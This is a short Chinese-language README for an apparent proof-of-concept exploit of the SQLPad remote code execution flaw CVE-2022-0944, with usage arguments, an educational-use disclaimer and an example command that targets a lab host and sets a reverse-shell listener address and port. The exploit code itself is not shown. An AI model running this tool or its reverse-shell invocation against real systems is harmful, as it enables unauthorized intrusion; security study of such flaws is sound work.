针对 SQLPad RCE (CVE-2022-0944) 的概念验证利用,可在攻击者 PC 上实现带反弹 Shell 的远程代码执行(RCE)。
usage: script.py URL IP PORT
positional arguments:
URL URL to SQLPad
IP Listener host address for reverse shell
PORT Listener port for reverse shell
示例:
# 触发利用
./script.py http://admin.sightless.htb 10.10.11.2 443
此代码仓库中的工具仅供教育目的使用,专门用于网络安全学习环境。本代码的作者不对因使用、滥用或修改本代码所产生的任何后果承担责任。本代码按“原样”提供,不附带任何明示或暗示的担保,包括但不限于对适销性或特定用途适用性的暗示担保。